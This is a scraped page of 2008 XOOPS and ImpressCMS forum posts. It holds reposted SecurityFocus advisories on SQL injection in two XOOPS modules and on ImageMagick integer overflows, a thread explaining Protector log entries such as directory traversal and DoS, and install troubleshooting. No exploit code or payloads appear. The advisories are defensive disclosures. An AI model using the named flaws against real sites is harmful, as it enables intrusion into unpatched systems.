Re: [Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

  • 2008/4/24 12:51:34
  • Tom

Ah, thanks for that Shine.

I was worried for a while there, as I mentioned I got many sites running on the latest X and with DJ's article module.

Thanks again

Topic


Topic


Re: [Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

  • 2008/4/24 4:38:20
  • Shine

I am quit sure this vulnerability concerns the module: articleS 1.03 from AndyM.
http://support.sirium.net/modules/mydownloads/viewcat.php?cid=2

The alert says:
Xoops All Version -(module)Articles- (file)Article.PHP
modules/articles/article.php

So this concerns NOT DJ's module article.

Environment:
PHP Version 5.2.4
SQL: 5.0.77
Zend: v2.2.0
Apache: 1.3.39


Re: [Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

  • 2008/4/24 3:32:38
  • Tom

I hope this vulnerability isn't in the X core as well as the module, as I've got many sites running on the latest versions of XOOPS.

Perhaps it could be the other article module?





Re: [Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

Could be - wasn't sure if it was "article" or "articles".







[Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

XOOPS Article module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

Source: http://www.securityfocus.com/bid/28879/references

Giba


[Security Alert] - XOOPS Recette 'detail.php' SQL Injection Vulnerability

XOOPS Recette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Recette 2.2 is vulnerable to this issue; other versions may also be affected.

Quote:


Bugtraq ID: 28859
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Apr 19 2008 12:00AM
Updated: Apr 21 2008 06:17PM
Credit: S@BUN
Vulnerable: Xoops Recette 2.2



Source: http://www.securityfocus.com/bid/28859/references

Giba


Re: Protector log

I'm seeing a lot of stuff similar to the above and more in protector logs across a couple of sites, starting from 12 April. Anyone finding stuff like this in their logs? (see picture, Protector won't let me post all the bad stuff here :)


Attach file:



png  protector-log-messages.png (0.00 KB)



Re: Protector log

Quote:


i mean this one cuz i've never seen it on protector . at the end of the log there is a pwd !
this mean that the attacker has the access to my site ?



it's unlikely, if protector logged it, it's probly prevented it. and if he had retrieved that passwrd from that directory traversal, it would not be the password to your website, but more than likely a password for a user account on the server such as root etc. which i think the server security would prevent that too.

Live as if you were to die tomorrow, Learn as if you were to live forever

The beauty of a living thing is not the atoms that go into it, but the way those atoms are put together!


Re: Protector log

the dos report might not be malicious. bare that in mind :)

you can get a log of a dos attack with protector, when you are refreshing the page so many times, or if you get your password wrong and post again too quickly.. it can log it as a DOS event. but that's not a reason to dismiss the DOS. but it's advisory to still investigate the source ip of the log entry to determine if it was an intentional DOS attack or just an over zealous user.

you'll do better checking the server logs and comparing to protector logs.. it's more likely that a proper malicious DOS attack would be detected and stopped by the servers firewall.

Live as if you were to die tomorrow, Learn as if you were to live forever

The beauty of a living thing is not the atoms that go into it, but the way those atoms are put together!


Re: Protector log

Quote:


skenow wrote:
DIRECTORY TRAVERSAL - definitely an attempt to find a server vulnerability and read password or configuration files, or find folders/files that are world writable



i mean this one cuz i've never seen it on protector . at the end of the log there is a pwd !
this mean that the attacker has the access to my site ?



Re: Protector log

You have several different events, each with different severities -

CRAWLER - often a result of search bots crawling and indexing your site, but also can be someone copying your site. I often see this associated with Firefox users because FF has a prefetch 'feature' that scans the current page for links and begins to cache the linked pages.

DIRECTORY TRAVERSAL - definitely an attempt to find a server vulnerability and read password or configuration files, or find folders/files that are world writable

URI SPAM - The usual suspects - spammers trying to get their links on your site. The SPAM POINTS are the number of urls in the POST

DoS (denial of service) - flooding the server with requests in an attempt to bring it down, making your site inaccessible. Wikipedia: Denial of Service



Protector log

hi,today i've found a log on protector that i didnt understand is is harmful?
i've attached a screenshot


Attach file:



png  protector.png (0.00 KB)



[Security Alert] - ImageMagick XGetPixel/XInitImage Multiple Integer Overflow Vulnerabilities

Reported by: SecurityFocus

ImageMagick is prone to multiple integer-overflow vulnerabilities because it fails to properly validate user-supplied data.

An attacker can exploit these issues to execute arbitrary code in the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.



Vulnerable: XFree86 X11R6 4.3 .0.2
XFree86 X11R6 4.3 .0.1
XFree86 X11R6 4.3 .0
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Linux Mandrake 10.0 AMD64
+ MandrakeSoft Linux Mandrake 10.0
+ MandrakeSoft Linux Mandrake 9.2 amd64
+ MandrakeSoft Linux Mandrake 9.2
+ MandrakeSoft Linux Mandrake 9.1 ppc
+ MandrakeSoft Linux Mandrake 9.1
+ RedHat Fedora Core1
+ RedHat Linux 9.0 i386
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux -current
+ Turbolinux Turbolinux Desktop 10.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
X.org X11R7 1.1.1
X.org libx11 1.0
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Turbolinux wizpy 0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 10.0.0 x64
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux FUJI
Turbolinux Turbolinux 10 F...
TurboLinux Personal
TurboLinux Multimedia
Turbolinux FUJI 0
TransSoft Broker FTP Server 8.0
Sun Solaris 10.0 _x86
Sun Solaris 10.0
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8
SGI ProPack 3.0 SP6
S.u.S.E. UnitedLinux 1.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. SUSE Linux Enterprise Server 9 SP3
S.u.S.E. SUSE Linux Enterprise Server 10
S.u.S.E. SUSE Linux Enterprise Desktop 10
S.u.S.E. SLE SDK 9
S.u.S.E. SLE SDK 10
S.u.S.E. openSUSE 10.3
S.u.S.E. openSUSE 10.2
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Open-Enterprise-Server 1
S.u.S.E. Open-Enterprise-Server 0
S.u.S.E. Novell Linux POS 9
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 10.2 x86_64
S.u.S.E. Linux Professional 10.2
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 10.2 x86_64
S.u.S.E. Linux Personal 10.2
S.u.S.E. Linux Personal 10.1
S.u.S.E. Linux Enterprise Server SDK 9
S.u.S.E. Linux Enterprise Server 9-SP3
+ Linux kernel 2.6.5
S.u.S.E. Linux Enterprise Server 10
+ Linux kernel 2.6.5
S.u.S.E. Linux Enterprise SDK 10
S.u.S.E. Linux Desktop 10
S.u.S.E. Linux 9.3 x86-64
S.u.S.E. Linux 9.3 x86
S.u.S.E. Linux 10.1 x86-64
S.u.S.E. Linux 10.1 x86
S.u.S.E. Linux 10.1 ppc
S.u.S.E. Linux 10.0 x86-64
S.u.S.E. Linux 10.0 x86
S.u.S.E. Linux 10.0 ppc
rPath rPath Linux 1
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1 IA64
RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux 5 server
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Pardus Linux 2007.1
OpenBSD OpenBSD 4.0
OpenBSD OpenBSD 3.9
MandrakeSoft Linux Mandrake 2007.1 x86_64
MandrakeSoft Linux Mandrake 2007.1
MandrakeSoft Linux Mandrake 2007.0 x86_64
MandrakeSoft Linux Mandrake 2007.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
ImageMagick ImageMagick 6.3.3-3
ImageMagick ImageMagick 6.3.2
ImageMagick ImageMagick 6.3.1
ImageMagick ImageMagick 6.2.9
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
Avaya Messaging Storage Server MSS 3.0
Avaya Messaging Storage Server
Avaya Message Networking MN 3.1
Avaya Message Networking
Avaya Interactive Response 1.3
Avaya Interactive Response 2.0
Avaya Integrated Management 2.1
Avaya Integrated Management
Avaya CMS Server 13.0
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0
Avaya CMS Server 14.0
Avaya CMS Server 13.1
Apple Safari 3.0.3
Apple Safari 3.0.2 Beta for Windows
Apple Safari 3.0.1 Beta for Windows
Apple Safari 3 Beta for Windows

Giba


Re: Install page wont go away

  • 2008/4/8 15:13:37
  • Tom

There were no real issues from my side, I re-uploaded all the files to ensure they were done correctly, then installed it again and it worked straight out of the box.

The mainfile.php originally showed as being blank before I installed.

I believe taritrott is using some kind of web browser FTP, not sure if this caused some complications.

there was also another folder with ImpressCMS in, which was not web root (one above), It's possible he could of been uploading there rather than the web root where the main ImpressCMS was to be.



Re: Install page wont go away

Thanks Tom,

What was the problem? How can we improve our installation script to avoid these kind of problem ?

Marc-André Lanciault
Founder and CEO INBOX International inc.
Co-Founder ImpressCMS


Re: Install page wont go away

Thank you Tom.

If theres any feedback you can give us to improve things, please do.